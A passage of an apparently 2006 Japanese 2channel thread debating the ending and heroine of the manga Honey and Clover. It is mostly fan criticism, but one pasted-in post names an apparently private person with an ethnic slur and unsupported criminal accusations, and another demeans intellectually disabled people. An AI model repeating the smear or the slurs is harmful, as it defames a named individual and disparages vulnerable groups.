キモイ願望垂れ流しは引く

791 :花と名無しさん:2006/10/01(日) 01:08:36 ID:???0
>>783
いやふつーに名作だよ。少女漫画内で言ったら殊更ね

792 :花と名無しさん:2006/10/01(日) 01:16:17 ID:???0
あの・・・






















まだ恨み言尽きませんか?

793 :花と名無しさん:2006/10/01(日) 01:24:45 ID:???0
>>791
へ?

794 :花と名無しさん:2006/10/01(日) 01:33:04 ID:3snvgw930
男だが今から読んでみることにする。


795 :花と名無しさん:2006/10/01(日) 01:39:34 ID:???O
>789 西は何て言ってたの?

796 :花と名無しさん:2006/10/01(日) 02:08:40 ID:???0
>>793
Ho!

797 :花と名無しさん:2006/10/01(日) 02:21:41 ID:DUizfglO0
すいません、最新刊コンビニとかで買えます?
近くにローソンがあるんですが。


798 :花と名無しさん:2006/10/01(日) 02:26:24 ID:???0
しらんがな
近くなら行ってみれば

799 :花と名無しさん:2006/10/01(日) 02:49:46 ID:???0
>>789
あずまきよひこは何てコメントしてるの?
羽海野さんは「よつばと!」が好きだと言ってるね。
はぐのことを森田に「はぐすけ」と呼ばせたところを見ると
あずまんがも好きっぽい。

800 :花と名無しさん:2006/10/01(日) 03:44:04 ID:???0
スローライフ好きな人は多いだろ。
別段ふつうじゃない?

801 :花と名無しさん:2006/10/01(日) 04:06:24 ID:8mG6KkTcO
>>739
…今更ですが。
内容は納得できるけど、まるで、相手に意地悪な言い方をしてストレス発散をしているように聞こえます。

802 :花と名無しさん:2006/10/01(日) 09:36:25 ID:???O
>>795、799
西はコミクスで少女漫画好きと明言した上で
落書きページでハチクロを購入者だとバラしてた。
あずまはよつばと!の中で次女がハチクロを読んでた。


この位です。
特にハチクロに対してコメントを見た訳ではないけど
作品に反映させるのは関心を持っているからかなとは思った。
久米田は絶望先生のネタだったからファンとは限らない感じ。
最終兵器彼女の作者とはお互いラブコールを送ってたはず。うろ覚え。

803 :花と名無しさん:2006/10/01(日) 09:44:46 ID:???0
ウミノさんって佐藤藍子みたい

804 :花と名無しさん:2006/10/01(日) 10:25:26 ID:???0
>>779
別に普通じゃん
世間のおばさんなんてこんなもんだよ

805 :花と名無しさん:2006/10/01(日) 10:26:37 ID:???O
前から大ファンでした

806 :805:2006/10/01(日) 12:20:29 ID:???O
というのは嘘です

807 :花と名無しさん:2006/10/01(日) 12:22:12 ID:???0
>>802
久米田がハチクロを絶望先生のネタにしてたのはいつ頃?
マガジンで絶望先生読んでたけど見落としたかもしれない。
コミックスにはもうなってる?(自分は1〜2巻しかまだ買ってない)

なんでこの漫画がオトコにウケるのかわからん。
(久米田がネタにしてるのはファンという意味ではないだろうけど。
 久米田は改蔵ではNANAもネタにしてた。)

808 :花と名無しさん:2006/10/01(日) 12:25:17 ID:???O
>>801
アテクシのハチグロを馬鹿にしないでよ!とキレないキレない

809 :花と名無しさん:2006/10/01(日) 13:39:47 ID:???0
>>807
自分が覚えてるのは背景にハチクロの題名があっただけ
内容にはふれてないんじゃないかな

810 :花と名無しさん:2006/10/01(日) 15:13:52 ID:???O
>>807
俺男だけどこのマンガ普通に面白いと思うんだが

811 :花と名無しさん:2006/10/01(日) 15:41:13 ID:???0
私の周りの男友達も大絶賛してた。
けど私はハマるほどではなかったな〜
細かいストーリー上の辻褄を気にしないで読む分には面白い方かと。

812 :花と名無しさん:2006/10/01(日) 15:53:33 ID:???O
男アピールしたがる奴ってなんなの?

813 :花と名無しさん:2006/10/01(日) 15:55:32 ID:???0
すべてとは言いませんが・・・
大雑把に全体を見る男脳
細かく局地的に見る女脳
らしいですね。

814 :花と名無しさん:2006/10/01(日) 15:56:43 ID:???0
>>812 そこばっか気にするキミも…

815 :花と名無しさん:2006/10/01(日) 17:05:06 ID:???0
今わかった。はぐってとんだ腐女子だな。
森田とお兄ちゃんをくっつけて、
自分はヲチを決め込むのが本望だったんだな。

816 :花と名無しさん:2006/10/01(日) 17:37:17 ID:???0
ぱらぱらっと読んだ人は面白いと感じるかもしれないけど
何年か愛読してた人は期待してただけに終盤裏切られた感じ
自分はもう熱は冷めて売ったけど、終わってからもこんだけ論争があるのは
ある意味成功?

817 :花と名無しさん:2006/10/01(日) 18:44:49 ID:???0
男の書き込みは面白いから好きだよ。
賢い男の書き込みは
「へー。そういう考え方もあるのか」
「自分にはそんな考えは思いつかなかった、さすがだな」
と目からウロコが落ちるし
馬鹿な男の書き込みは
直接被害が降りかかりさえしなければ
珍獣をヲチするように楽しく見ていられるし。

818 :花と名無しさん:2006/10/01(日) 19:31:21 ID:gDe50yBV0
ていうか、うみのさんって40過ぎのおばさんなの?
旦那や子どもはいるのかいな?

819 :花と名無しさん:2006/10/01(日) 19:40:39 ID:???0
次の連載のヒロインも山田みたいなキャラなんだろうなーと思う。
そしてその次の連載も。
泣き虫で手作り好きで恋に一途ででもちょっと鈍感で誰からも愛される女の子。

820 :花と名無しさん:2006/10/01(日) 19:55:28 ID:???0
山田がヒロイン?


B型H系?

821 :花と名無しさん:2006/10/01(日) 19:55:52 ID:???0
バンド人間椅子のドラムさんと別れて今は独身なんじゃないの?

822 :花と名無しさん:2006/10/01(日) 20:13:23 ID:AI90kpbm0
女受けが悪いとしたら、感情移入させすぎたからじゃないかな。
登場人物のキャラが立ってて世界観がしっかりしてるから、
リアルと同じような感覚で感想もっちゃうんだろう。

自分は、他の漫画にはないベクトルがおもしろくてそこが好きだ。
どのキャラにも感情移入してないし、矛盾もあんまり気にしないほう。
個人の恋愛の行く末も、どんな展開でも気にならんし。

823 :花と名無しさん:2006/10/01(日) 20:28:57 ID:x9yNday80
>登場人物のキャラが立ってて世界観がしっかりしてるから、

ハァ?

824 :822:2006/10/01(日) 20:34:52 ID:???0
>>823
あ、ごめんやっぱ引っかかる言い方だったかな。
良くも悪くもってことだよ。
そこをほめてるわけじゃない。

825 :花と名無しさん:2006/10/01(日) 20:58:18 ID:dhbD/WxW0
>>822
俺も同じだ、個人の恋愛の行く末はどうでもいいと思って読んでたので面白かった。
学校が芸術系で30代以上の人(社会にでてもう一回恋愛やら挫折やらを味わった人)
には、実は最終回はハッピーエンドだったんじゃないかな。
ただ目線が中年のそれなんで、「糞みたいな終わり方」と言う人がいるのも良くわかる。
まあ感動したのは、オジンかオバンと言う事だw

826 :花と名無しさん:2006/10/01(日) 21:13:57 ID:???0
>>825
>ただ目線が中年のそれなんで
ああ、そうかも。
未来のある若い世代には理解不能なエピが多いかも。
男女間の嫌な(?)部分とかバリバリ描写してるし、
実体験でまったく触れたことがないと、
拒絶したくなるのかもしれん。

827 :花と名無しさん:2006/10/01(日) 21:27:33 ID:???0
「空の小鳥」の主人公の親がカバン職人だったと思うけど
ハチクロファンブックに、羽海野さんのお父さんがカバン職人だと書いてあった。
本当に羽海野さんの漫画の主人公=羽海野さんなんだな。

828 :花と名無しさん:2006/10/01(日) 21:30:49 ID:???0
若い子は理解できないよね〜というより
物語の流れが唐突過ぎてそこまでの展開が台無しになった
という感想の人が多いと思うけど。
年齢だけで判断されてもなぁ……

829 :花と名無しさん:2006/10/01(日) 21:48:50 ID:dhbD/WxW0
>>828
いやいや、若い子には〜なんて思ってないですよ。物語りの流れが唐突というのも
同意で、作者が描いてる途中で、知ってじか知らずか目線を変えていったので、
途中で面白いと思わなくなるひとがいても不思議じゃないなと。
ただ、変えていった方向が中年よりで、最後は中年殺しの禁じ手「青春賛歌」
だったのでイチコロにされましたという感想ですw


830 :花と名無しさん:2006/10/01(日) 21:53:10 ID:???0
>>828
つまり、「そこまでの展開が台無し」というのの、
「そこ」がある程度若者共感漫画だったのが、
いきなりおじんおばんよりに重心が変わったってことでは?
全部じゃなくて一部分だから、見えにくいかもしれない。

年齢だけで判断ていうか、明らかに前半と後半の
ターゲット層は無意識だろうが結果的に違ったんだと思う。
違う漫画としてやればよかったのかもしれないね。

831 :花と名無しさん:2006/10/01(日) 21:56:53 ID:dhbD/WxW0
>>830
同じ意見でうれしいですが、他の人達から見ればキモイかもしれませんな。
なので私はこのへんで失礼します。

832 :花と名無しさん:2006/10/01(日) 22:05:25 ID:???0
>>830
その重心の変化をウミノが一番描きたかった事なら
その変化の過程をもっと丁寧に描いて欲しかったな。
それこそ真山とリカ、山田と野宮のエピのように。
自分は一部分萌えエピの寄せ集めより
ハチクロという一本筋が通った話が読みたかったな。


単品エピは巧い作家だからウミノが短編向き作家と
言われるのは納得できる。


833 :花と名無しさん:2006/10/01(日) 22:32:30 ID:???O
男女の泥仕合に持って行きたがる女作家って必ずいるんだよな…

834 :花と名無しさん:2006/10/01(日) 23:09:02 ID:gDe50yBV0
ウミノのは、最初っから秀とはぐをくっつけるつもりだったんだと思うが?
何がそんなにイヤなのかいな?

835 :花と名無しさん:2006/10/01(日) 23:20:20 ID:???O
>>834
千年ROMれ

836 :花と名無しさん:2006/10/01(日) 23:27:10 ID:???0
千年女優

837 : :2006/10/02(月) 00:24:17 ID:9dZjvcyb0
「これまでの展開が台無し」とか言うヤツは、自分の理解を超えちゃったから文句言ってるだけに見える。

838 :花と名無しさん:2006/10/02(月) 00:27:15 ID:???0
凡人の理解を超えた電波だからなぁ・・・文句も出るだろwww

839 :花と名無しさん:2006/10/02(月) 00:31:35 ID:???0
>>834
森田とデートした後のはぐの様子をみて、それこそが恋だよ…
と思っている修のエピソードや、はぐによく似た子供がおにいちゃんが
大好きだからずっと一緒にいたいのうんぬんというエピソードがあるにも
関わらず、なお最初から修・はぐをくっつけるつもりだったとしたら、
驚きとともに、あのエピソードはなんだったの?と思われても仕方が
ないのではなかろうか。

840 : :2006/10/02(月) 00:50:14 ID:9dZjvcyb0
>>839
たとえば森田とのデート後のエピソードにしても、将来的に秀とはぐをくっつけるための伏線じゃなかったのかな。

ほんじゃ森田とくっつけば納得したかと言うと、それこそ陳腐なマンガになっちゃうし、竹本とくっついたら、それはそれで生理的にイヤだし、秀でいいんじゃね?



841 :花と名無しさん:2006/10/02(月) 00:54:02 ID:???0
いや、そういうエピソードがあるから
恋愛よりも芸術を選んだという決断が生きてくるんだとは思うよ
ただ最後の方急ぎすぎて、違う意味での驚きというか置いていかれた感があった

842 :花と名無しさん:2006/10/02(月) 00:56:33 ID:???0
841は>>839です

843 :花と名無しさん:2006/10/02(月) 01:01:37 ID:???O
私は修とはぐがくっつくのが嫌だったんじゃない。
年の差アリ&幼馴染み的なカップルもあると思う。

はぐが修に甘えきってる上にそれを容認する世界観に、ええ?となった。
しかも作者が、芸術系のヒトならわかってくれる、とか言ってるし。



844 :花と名無しさん:2006/10/02(月) 01:12:38 ID:???0
333 名前: おさかなくわえた名無しさん [sage] 投稿日: 2006/08/13(日) 23:51:47 ID:rFbcWuAF
高校の時美術部だった私。
たいして絵が上手くもないのになぜか制服に
わざと油絵の具で派手に汚れをつけ
『なりふりかまわず絵を描く私カコイイ』を演出。

油絵の具なので落ちることはなく臭く汚い制服を3年間着用。
爪の間にも油絵の具をつけて制服の着こなしはヒザ下スカートに
白のくるぶしソックス。 ひっつめ髪に銀縁めがね
『絵以外のことは無頓着なストイックな私』をアピール。

当然友達は出来ず、先生すら気味悪がって注意してこない。
調子に乗った私は、紺地の制服なので汚れが目立たないんだ!と思い
ついに白衣を(これもわざと汚して)着用。
背中に天使の羽を描き廊下を闊歩。しかし授業中は着れないという小心っぷり。

昼休みは教室で白衣を着てミュシャの画集を開き、
時折親指と人差し指で「」を作り
「この構図面白いわ・・・フフ」などと言いヘッタクソなデッサンを始めたり、

他の部員が賞を取るたび
「学生向けって苦手なのよね・・」
などとのたまっていた。

一般の部に応募経験なんてもちろん無し。

体育のバスケで右手を捻挫したときには保健の先生の前で
「すぐ直りますよね、描けなくなったら死んじゃうよぉぉ!」
とマジ泣き。

とかなんとかやってたくせに結局普通の大学(経済学部)に進学。
芸術という病に侵されてた3年間、実にもったいない高校生活だった。

845 :花と名無しさん:2006/10/02(月) 01:14:56 ID:???0
>>840
森田とくっいたからって陳腐なマンガだとは思わなかったよ。
竹本とくっいたら生理的にイヤっていうのもわからないなー。


846 :花と名無しさん:2006/10/02(月) 01:28:04 ID:???0
社会的に認められる価値=才能、美貌、経済力のどれかが無いと
何故だか近しい人にイチ個人としても愛されないっつー酷い話ですよ・・・

847 :花と名無しさん:2006/10/02(月) 02:28:19 ID:???0
>>846
そうなんですか?そんな酷い話でしたか?
ラストの持って往き方は、何だかな〜と思いましたが、
私は人として、そんなに悪いラストととは思いませんでした。

848 :花と名無しさん:2006/10/02(月) 03:41:55 ID:???0
それぞれのキャラにおける
「現状肯定」と「打開」の心理バランスが絶妙だった。

だが、はぐあゆリカにおいては最後まで
前者のみに重きが置かれている感が否めなかった。

それが、微妙なしこりを残す原因なのやも?

でもまぁ、うまくまとめられてる(誤魔化されてる?)方なんじゃないかな
漫画作品としては。


849 :花と名無しさん:2006/10/02(月) 03:55:16 ID:???O
>>848
誤魔化し方はピカ1だと思う。

あの雰囲気のある絵とポエムなモノローグでね。


850 :花と名無しさん:2006/10/02(月) 03:56:24 ID:1yn0rn9LO
>>847
釣り?

851 :花と名無しさん:2006/10/02(月) 08:18:23 ID:???0
はぐはウミノさんの化身=つまり腐女子。ってことだね

852 :花と名無しさん:2006/10/02(月) 08:24:46 ID:???0
>>834=840=847
アンカーは半角で付けろ。この意味が分からなきゃ半年ROMれ。
つーか空気が読めるようになるまで無条件に半年ROMってくださいおながいします。
あと「秀」って何回も書いてるけど、「修」だからね?


853 :花と名無しさん:2006/10/02(月) 09:27:51 ID:???0
釣りだろう?
じゃなきゃリア

854 :花と名無しさん:2006/10/02(月) 11:26:27 ID:???0
>>843
天才芸術家な全て優しくされて許されるって世界観だもんなぁ(女に限り。か?)


しかし傷つきやすい天才とそれを献身的に支える相方
という関係性マンセー☆な方向に逝っちゃうのは昔から
少女漫画にはあることだけども

作家の願望か?

855 :花と名無しさん:2006/10/02(月) 19:37:33 ID:???0
少女漫画っていうかやっぱBLっぽい

856 :花と名無しさん:2006/10/02(月) 21:13:15 ID:???0
>BLっぽい

確かに、男描いてる筈なのに一つも現実感がないからな
女の嫌なところは作者の意図とは別によく描かれてるけど

857 :花と名無しさん:2006/10/02(月) 23:03:53 ID:???0
はぐは、描いた物が手に入るはぐノートに描いちゃってたんだな・・・
シノブとカオルのやおいマンガを・・・

858 :花と名無しさん:2006/10/02(月) 23:08:41 ID:???O
はぐノートワロスw

つか、漫画知らなくて映画で知った層の女の子たちは、どう見てるのかな?やはり感動?

859 :花と名無しさん:2006/10/02(月) 23:26:30 ID:???0
あの映画はまったくマンガの読者層を広げなかったように思うよ

860 :花と名無しさん:2006/10/02(月) 23:35:04 ID:???0
男衆のエゴがそれなりに描写してたみたいに
はぐの身勝手さとかも作中で言及してればなあ

861 :花と名無しさん:2006/10/02(月) 23:40:23 ID:???O
>>859
そうなんだ。
ミーナとかファッション誌にも普通に映画紹介とか出ていたし、一般層にも浸透してるのかと思ってた

862 :花と名無しさん:2006/10/02(月) 23:43:48 ID:???O
>>860
はぐは天才だからっていう免罪符があるから許されるんでしょw



863 :花と名無しさん:2006/10/02(月) 23:46:54 ID:???O
リカにしろはぐにしろ山田にしろ、私が悪い的なこと言っても、口だけで行動に現れてない。

そう言えば、そんなことないよ☆って返ってくると思ってるんだろう。



864 :花と名無しさん:2006/10/03(火) 01:29:09 ID:???0
ハチクロに出てくる女は大概何でも許されて愛されちゃう天使、乙女、聖女だからね
上にも出てきたけど最初から気になってたのが、はぐが何かしてもらってもほとんど「ありがとう」って言わないこと
普通そんな子だったら誰からも相手にされなくなる
でもこの漫画では、それは幼くて守られるべき天使的なイメージになっちゃってる

最終的にはぐは修を選んだけど、森田にはいつも見てるからと言い、竹本には思い出の詰まった四葉クローバーでサンドを作る
この事実さえ見ればかなり八方美人な存在だよね
こんな事されたんじゃ森田も竹本もなかなかはぐのこと忘れられない
しかも一応修に「人生ください」って言ったけど、
修と山田の会話の中で、はぐは修が恋愛感情抱いてること知らないかもとか出てきて唖然とした

865 :花と名無しさん:2006/10/03(火) 02:16:43 ID:???0
竹本ってハグにとってのなんだったんだろう

親友→山田
夫→臭
恋人→森田
ストーカー→真山

866 :花と名無しさん:2006/10/03(火) 06:10:38 ID:???0
>>865
パシリもしくは精神的召使い

ハチクロは、自意識過剰なアート志向な女子大生がバブリーな時代をすごしたであろう人に
しかできない芸当ではあったと思うよ。
何度か読み返したが、純愛という真綿かオブラートをかぶせた自己中女の感情の赴くままに
言動した打算的恋愛ゲームのように思えるようになってしまった。

867 :花と名無しさん:2006/10/03(火) 07:58:57 ID:???0
>>458
どっちも極端な依存でしかなりえない関係だけどな
バナナは名作だと思うが吉田さんもアレ以降
安易な傷ついた天才マンセー方面に逝ってしまい
それ以前の泥臭いけど清濁ある漫画を描かなくなってしまった

ハチクロにしても若い子は理解できないよね〜って意見をいう
上の年代の人って、むしろ天才幻想・信仰が強いから(クリエイター信仰?)
勝手に納得すんのかなぁとも思う。今は腐ぐらいしかそういうのを
好まないつーか。まぁ竹本の〆方は結構納得したが
はぐの方はただひたすらドリームがキモイ

868 :花と名無しさん:2006/10/03(火) 08:31:49 ID:???0
うん。天才が普通の生活を犠牲にしてまで目指した先にあるものなんて
今の時代誰も欲しいとか羨ましいとか思ってないでしょ。
80年代ならともかく。だからはぐマンセーとかはあ?って感じ

名声? 歴史に名を残す? 自己陶酔?
仲間と笑いあったりお金持ったりで十分じゃん。

869 :花と名無しさん:2006/10/03(火) 09:04:00 ID:???0
いっそのこと、はぐが知的障害者だったら、まだ納得がいくんだがな…。
ある種類の知的障害者には、ひとつの才能が突出することがあるし。
女性の知障の一部には、純粋で邪気のない
美人や可愛い容姿に生まれつく人もいる。
(知障に関わる仕事をしたことがあるが、イケメンの知障は見たことないな)

そしてハチクロの真山野宮以外のメイン男キャラ達は
そんな知障に惚れたマニアックな男達。

870 :花と名無しさん:2006/10/03(火) 09:16:30 ID:???0
むしろ天才のストイックな生き方とか圧倒的な才能を発揮する漫画とかは
今でも受ける要素ではあるけれど
そこにどっぷり自己投影が入り込む天才が傷ついてるの!
天才だから芸術のために無私で助けてあげて!という
才能を盾にしたベタベタな甘えは今の時代には冷めた目で
見られるというか



はぐの選んだ道がもっと孤高の芸術家っぽいものだったら
この気持ちの悪い感じも違ったかもなあ

871 :花と名無しさん:2006/10/03(火) 09:47:49 ID:???0
そうそう、はぐの行く道がイバラの道だってことをはっきり示すべきだった
そしてみんなに好かれたまま終わってはならなかった

872 :花と名無しさん:2006/10/03(火) 12:08:32 ID:???O
そんな事より竹本役の声優さん退院したそうで
よかったなあ
DVDは彼の声で発売してほしいね
まだ暫くリハビリだそうだから無理かな
完全復帰するまで、視聴者、読者の代わりに
修の如くしっかり彼の事支えてやってくれよ、羽海野先生

873 :花と名無しさん:2006/10/03(火) 13:58:37 ID:???O
退院したのか!
かなりの重傷みたいだったから心配してたが、よかった。

874 :花と名無しさん:2006/10/03(火) 15:23:31 ID:???O
DVDでは神谷さんで撮り直すそうだよ。


875 :花と名無しさん:2006/10/03(火) 18:45:39 ID:j7HhdWYb0
はぐは長いこと友達もいなかったし、怖い婆さんと親しい会話も
出来なかったろうから、コミュニケーションが下手くそだったり
精神的に成熟していなくてもしゃーないんじゃない?
皆に八方美人みたいに振舞うのも、やっとできた大切な友人を
大事にしようとした結果と考えれないかなぁ。

はぐは大学で精神のリハビリ、数年後に自立、って考えるのが妥当だとおもた。
きっと修もはぐも自立の時が来ればそれぞれの道を行くはず。
ただ作者にそこまで描く心の余裕がなかったからまる投げしたんだな。

876 :花と名無しさん:2006/10/03(火) 19:01:01 ID:???0
>>875
学校から急いで帰宅して婆さんの面倒をみていたんだもの。
(この分だと登校時間も遅刻ギリギリだったよな、きっと)
そんな状況じゃ友達を作るヒマもないよ。

そして散々ガイシュツだけど、はぐが礼も詫びも言わない人間になったのは
婆さんに抑圧されたはぐが精神的にも小さくなって、些細な事に対しても
必要以上に謝ったり礼を言ったりしてしまうようになってしまい
見かねた修が「お前は何も悪くないんだから、謝まったりする事はないんだよ」
と言い聞かせ続けた結果、今度は必要最低限の礼も詫びも言わなくなった、と考えてみた。


877 :花と名無しさん:2006/10/03(火) 19:12:10 ID:j7HhdWYb0
>>876
なんと(゜д゜)!!
修が洗脳術まで体得していたとは。恐ろしい子・・・
さらにその技で真山マスターになったのか!

878 :花と名無しさん:2006/10/03(火) 19:31:45 ID:???0
>>870
孤高の芸術家としての選択をするとしたら
たぶん誰ともくっつかないということになるんだろうけど
たしかにその方がずっと後味がよかったと思う

879 :花と名無しさん:2006/10/03(火) 20:55:27 ID:???0
>>875-876
説得力ある解釈だな。
筋が通ってるな。

で、作者は
「はぐの話は読者につらい話になるから
 すごい勢いで書きとばした」
ってわけか。

そこを書きとばしちゃあいけないだろ!?と
作者には言いたくなるんですが。

880 :花と名無しさん:2006/10/03(火) 21:37:13 ID:???0
修がすぐに死んで、リカのようになったはぐが
新しく真山のような男をつかまえるさまが目にみえるようだ


881 :花と名無しさん:2006/10/03(火) 21:44:40 ID:???0
>>733
作者がどうのなんて誰も気にしない
気にしてるのは腐女子だけ
きんもーっ☆

882 :花と名無しさん:2006/10/03(火) 22:10:22 ID:???O
>>881
擁護に必死な信者きんもー★

作者があんまり痛い痛い言われてるからそう言うしかないわけだね。

883 :花と名無しさん:2006/10/03(火) 22:56:58 ID:???0
>きんもー★

同人ってさ結局その人の個性が出ないと絵はうまくてもダメなんだよねと熱く語ってた奴を思い出したw
痛い痛いと言ってるのは腐女子だけなので何の問題も無いのですが、何か?

884 :花と名無しさん:2006/10/03(火) 23:53:29 ID:???O
つか なんで 終わった作品に まだ作品を叩く奴が現れてんだ?
結構しつこいんだな
まだ希望を持ってんのかな?

885 :花と名無しさん:2006/10/04(水) 00:15:45 ID:???0
どんな作品のスレも最終回を迎えた途端に
評論家ぶった輩であふれかえる。
そのほとんどが重箱の隅をつつくようなイチャモン。
ケチをつけるだけならバカでもできるってことがまるで分かってない。

886 :花と名無しさん:2006/10/04(水) 00:29:32 ID:???O
釣られるなよ

887 :花と名無しさん:2006/10/04(水) 00:38:58 ID:???0
>>884
スピンオフがまだあるからねぇ・・・

888 :花と名無しさん:2006/10/04(水) 00:41:42 ID:???O
作者を痛いと思ってるのは腐だけじゃないぞ

勝手に決めるな>>883

889 :花と名無しさん:2006/10/04(水) 00:41:54 ID:???0
終わり方が悪かったんだから仕方ない
終わり悪けりゃすべて台無し

890 :花と名無しさん:2006/10/04(水) 00:52:09 ID:???0
しかし藤原事務所のあいつ、どうみても
ゲンスルーです。本当にありがとうございました

891 :花と名無しさん:2006/10/04(水) 01:28:28 ID:???0
ttp://moe.unofficial.jp/up2/stored/1457.jpg

うーん似てる?

892 :花と名無しさん:2006/10/04(水) 01:52:01 ID:???O
>>881 >>883 >>885

893 :花と名無しさん:2006/10/04(水) 19:53:23 ID:???O
10巻3度読み返して3度泣いた俺が通りますよ
サンドイッチの具が判明するとこからかぶりついて泣くとこまで
ずっと好きで読み続けてきた漫画だし
なんか胸がいっぱいになった

894 :花と名無しさん:2006/10/04(水) 20:48:32 ID:???0
ハチクロのラスト読んでたら何故か自虐の詩のラストを思い出した

895 :花と名無しさん:2006/10/04(水) 20:50:00 ID:???0
10巻の終末感がいいよな
スピンアウト企画とかやめて欲しいなぁ

896 :花と名無しさん:2006/10/05(木) 00:08:00 ID:???0
>>893
バラエティのヤラセ企画で泣けちゃうタイプだよね

897 :花と名無しさん:2006/10/05(木) 02:21:25 ID:hVJiNzhq0
男だけど読んでみることにして、3巻まで読んだ。
今の所特に何って言う事もないけど、新鮮ではある。


898 :花と名無しさん:2006/10/05(木) 10:24:40 ID:???0
まあ3〜4巻あたりが一番面白いからな。

899 :花と名無しさん:2006/10/05(木) 11:12:49 ID:???O
はぐは怪我しなかったら、修とああいうことにならず、まず森田とくっついたんだろうな。つづくかどうかは別にして。

900 :花と名無しさん:2006/10/05(木) 11:25:57 ID:???0
修ちゃん、
はぐがいなくなったらしんじゃうよ。寂しさのあまり、ウサギみたいに・・・

901 :花と名無しさん:2006/10/05(木) 14:13:26 ID:???O
>>893
そんなに雑草食いたいんだな

902 :花と名無しさん:2006/10/05(木) 18:24:19 ID:???0
>>894
自虐は最初がごく普通の4コマでラストにいくにつれて
すごい速度でいいエピソードが畳み掛けられていったマンガ。
いっしょにしないでください。

903 :花と名無しさん:2006/10/05(木) 18:40:21 ID:???0
でも最後あたりで列車で旅立つ主人公に友達がかけつけて手作り弁当渡したり、
「意味がある」のモノローグといい、
言われればちょっと被ってるところはあるかも?>自虐
もちろん感動は天と地の差ほどあるが。

904 :花と名無しさん:2006/10/05(木) 18:51:45 ID:???0
自虐嫌だ
二度と読みたくない。

905 :花と名無しさん:2006/10/05(木) 19:15:34 ID:???0
何だかラストが物議を醸してるみたいだけど、ハッピーエンドじゃないの?

906 :花と名無しさん:2006/10/05(木) 19:42:46 ID:???O
ハチクロ嫌だ
二度と読みたくない。

907 :花と名無しさん:2006/10/05(木) 19:48:19 ID:hVJiNzhq0
何だかラストが物議を醸してるみたいだけど、ハッピーエンドじゃないの?


908 :花と名無しさん:2006/10/05(木) 19:53:46 ID:???0
なにこの無限ループ

909 :花と名無しさん:2006/10/05(木) 19:57:27 ID:???0
何だかラストが物議を醸してるみたいだけど、ハッピーエンドじゃないの?

910 :花と名無しさん:2006/10/05(木) 22:28:17 ID:???0
ハッピーエンドだろ

911 :花と名無しさん:2006/10/05(木) 22:33:04 ID:???0
森田と竹本と読者以外

912 :花と名無しさん:2006/10/05(木) 23:59:56 ID:DNUEzz0c0
だれかさんのオツムとフトコロはハッピーだお(´・ω・`)

913 :花と名無しさん:2006/10/06(金) 00:24:45 ID:???0
ぶっちゃけ竹本個人の青春話としてはまぁまぁイイ話だったと思う
安易にはぐとくっついて、幸せ掴んでハッピーラッキー☆というわけでもなく
森田は・・・もうちょっと丁寧にエピソード描写できなかったのかと
なんか最終的に一番ワリ食ったような気も
真山と山田は恋愛エピ中心だからあれはあれで

はぐの話は全てが気持ち悪い。ハチクロ全てが気持ち悪く見えるほどに

914 :現実:2006/10/06(金) 01:57:26 ID:???0
         _   -――-   、
        ´ ______  ヽ
    /  /______\ ヽ
  /    / /  / /     ̄    |
  (  (  ( ( _ ( 〈〈_  )  ) |
     \ | l´  ◎  ◎  `l'| |ν  |   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     / /.\ ∴) ∀ (∴ | | |  |  <   花本はぐみです
    / /⌒\      ノ| ノ  |   \___________
    / \    )TTTTT´ ノ /    |
        \/\   //  /  |
         /   \/ レ  レ'  ノ

915 :花と名無しさん:2006/10/06(金) 02:06:43 ID:QKI3YrBs0
竹本個人の青春話としてはまぁまぁイイ話なのか。
じゃあ最後まで読もう。

916 :花と名無しさん:2006/10/06(金) 02:36:28 ID:???0
はぐ叩いてるのって絶対女だと思う

917 :花と名無しさん:2006/10/06(金) 02:53:25 ID:???0
なるほど
男ははぐマンセーなのか

918 :花と名無しさん:2006/10/06(金) 03:34:24 ID:???0
>>876
そういう設定は有りだと思うけど
なら作中ではぐに対して挨拶をしないことを指摘するキャラがいたら良かったなと思う
自分がその辺気になったのは原作じゃなくアニメを見てからなんだけど
声付きだと今ここでお礼言わないのは不自然だなって違和感がすごいあったんだよね

はぐのコミュニケーション能力の未熟さを
最初周囲の学生に溶け込めないことで表現してるのかなと思ったんだけど
あれははぐは才能故に浮いてるって感じになっちゃって
結局そこらへんはその後もスルーされてたのが
結果的にははぐの評価落としてる気がする
もし>>875-876の言うような裏設定があるとしても
作中では一切言及されてないから普通の読者はそこまで補完しないだろうし

919 :花と名無しさん:2006/10/06(金) 03:34:57 ID:Z/iBCDwD0
51 :ひよこ名無しさん :2006/09/28(木) 20:33:08 ID:???


みんな、名古屋に「竹石 圭佑」って物がいたことを忘れないでやってくれ。
竹石は確かに人間のゴミクズで在日で、覗きや万引きで逮捕されるような
どうしようもない奴だが、それでも一応生きてるんだ…
だが、竹石も今年で20歳…脳内は小学生くらいの思考能力しか備わってないが…
馬鹿でかなりの目立ちたがりだから、成人式に出て、騒ぎを起こさなければ良いが…


920 :花と名無しさん:2006/10/06(金) 03:52:35 ID:bvWn4Rq+0
ウミノさん四十路なの?30,31くらいだと思ってた

921 :花と名無しさん:2006/10/06(金) 09:49:36 ID:???0
>>917
マンセーじゃないけど過剰に叩くほどのものでもないな
何故そんなに気に入らないのかが良くわからない

922 :花と名無しさん:2006/10/06(金) 15:21:19 ID:???0
まあ漫画のキャラの性格がどんなにめちゃくちゃでも

はぐ叩いてるのって絶対女だと思う、とか
マンセーじゃないけど過剰に叩くほどのものでもない
何故そんなに気に入らないのかが良くわからない、とか

そんな事を実在する人間が言う方が遥かに気持ち悪い事は確かだな

923 :花と名無しさん:2006/10/06(金) 15:28:45 ID:???0
漫画読んでキャラについて誉めたり貶したりって
オタなら割と普通の行為だと思うけどね
少年漫画で男がやってるのと一緒

ただ漫画を材料にキャラについて発言してる人より
不特定多数のレスから発言者を勝手に想定する人の方がよっぽど想像力あるなとは思う

924 :花と名無しさん:2006/10/06(金) 16:21:00 ID:???0
分かりやすいな

925 :花と名無しさん:2006/10/06(金) 16:49:02 ID:???O
想像力というより妄想力

926 :花と名無しさん:2006/10/06(金) 17:16:43 ID:???0
最終回は無難に纏めたけど何だかな
恋愛観がまったく合わない合わないから良くないって訳じゃないけど
一応女メイン3人(はぐ・あゆ・リカ)いるのに根底のタイプが
自己憐憫の塊で同じだからか焼きまわし見ている気分になった

凄い才能の持ち主を前にして自分の立ち位置が分からなくなってしまうとか
そういう才能や能力の葛藤とかの描写は個人的に好きだから余計に残念

927 :花と名無しさん:2006/10/06(金) 17:36:59 ID:???0
>>922-925
男だが男のヲタはそういう極端な奴多い。
女性アイドルやタレントのヲタなんか
ヲタでいるうちは対象の人物が何をしても何が起こっても
